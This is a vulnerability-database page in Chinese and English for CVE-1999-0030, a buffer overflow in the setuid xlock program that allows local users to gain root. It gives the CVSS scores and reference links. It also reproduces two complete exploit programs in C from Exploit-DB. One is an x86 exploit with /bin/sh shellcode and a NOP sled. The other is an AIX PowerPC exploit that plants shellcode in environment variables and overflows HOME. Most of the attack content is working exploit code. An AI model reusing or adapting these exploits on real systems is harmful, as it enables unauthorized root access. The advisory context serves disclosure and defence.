CVE-1999-0030
CVSS7.2
发布时间 :1997-07-16 00:00:00
修订时间 :2008-09-09 08:33:35
NMCOE    

[原文]root privileges via buffer overflow in xlock command on SGI IRIX systems.


[CNNVD]SGI IRIX xlock缓冲区溢出漏洞(CNNVD-199707-029)

        基于SGI IRIX系统的xlock命令存在缓冲区溢出漏洞。可以借助该漏洞获得根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0030
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0030
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199707-029
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

SGI IRIX xlock缓冲区溢出漏洞
高危 缓冲区溢出
1997-07-16 00:00:00 2005-10-20 00:00:00
本地  
        基于SGI IRIX系统的xlock命令存在缓冲区溢出漏洞。可以借助该漏洞获得根特权。

- 公告与补丁

        

- 漏洞信息 (19172)

BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (1) (EDBID:19172)
unix local
1997-04-26 Verified
0 cesaro
N/A [点击下载]
source: http://www.securityfocus.com/bid/224/info

The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access. 

/*   x86 XLOCK overflow exploit
     by cesaro@0wned.org 4/17/97

     Original exploit framework - lpr exploit

     Usage: make xlock-exploit
            xlock-exploit  <optional_offset>

     Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             996

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

int main(int argc, char *argv[])
{
   char *buff = NULL;

   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   int dfltOFFSET = DEFAULT_OFFSET;

   u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                          "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                          "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                          "\xd7\xff\xff\xff/bin/sh";
  int i;

   if (argc > 1)
      dfltOFFSET = atoi(argv[1]);
   else printf("You can specify another offset as a parameter if you 
need...\n");

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + dfltOFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}

		

- 漏洞信息 (19173)

BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (2) (EDBID:19173)
unix local
1997-04-26 Verified
0 BeastMaster
N/A [点击下载]
source: http://www.securityfocus.com/bid/224/info
 
The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access.

    /*
     *
     *   /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V
     *
     *   CREDITS: this code is simply a modified version of an exploit
     *   posted by Georgi Guninski (guninski@hotmail.com)
     *
     *   USAGE:
     *            $ cc -o foo -g aix_xlock.c
     *            $ ./foo 3200
     *            #
     *
     *   HINT: Try giving ranges from 3100 through 3400
     *   (If these ranges don't work, then run the brute
     *    korn shell script provided after the exploit)
     *
     *   DISCLAIMER: use this program in a responsible manner.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    extern int execv();

    #define MAXBUF 600

    unsigned int code[]={
            0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
            0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
            0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
            0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
            0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
            0x7c0903a6 , 0x4e800420, 0x0
    };

    char *createvar(char *name,char *value)
    {
            char *c;
            int l;

            l=strlen(name)+strlen(value)+4;
            if (! (c=malloc(l))) {perror("error allocating");exit(2);};
            strcpy(c,name);
            strcat(c,"=");
            strcat(c,value);
            putenv(c);
            return c;
    }

    main(int argc,char **argv,char **env)
    {
            unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
            int min=200, max=300;
            unsigned int return_address;
            char *newenv[8];
            char *args[4];
            int offset=3200;

            if (argc==2) offset = atoi(argv[1]);

            pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;

            *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
            *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000f
fff);
            *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
            *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000
ffff);

            return_address=(unsigned)&buf[0]+offset;

            for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
            strcpy((char*)&buf[nop],(char*)&code);
            i=nop+strlen( (char*) &code)/4-1;

            for(i=0;i<max-1;i++) frame[i]=return_address;
            frame[i]=0;

            newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
            newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
            newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
            newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
            newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
            newenv[5]=createvar("HOME",(char*)&frame[0]);

            args[0]="xlock";
            execve("/usr/bin/X11/xlock",args,newenv);
            perror("Error executing execve \n");

    }
		

- 漏洞信息

941
Multiple Vendor xlock Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1997-05-02 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站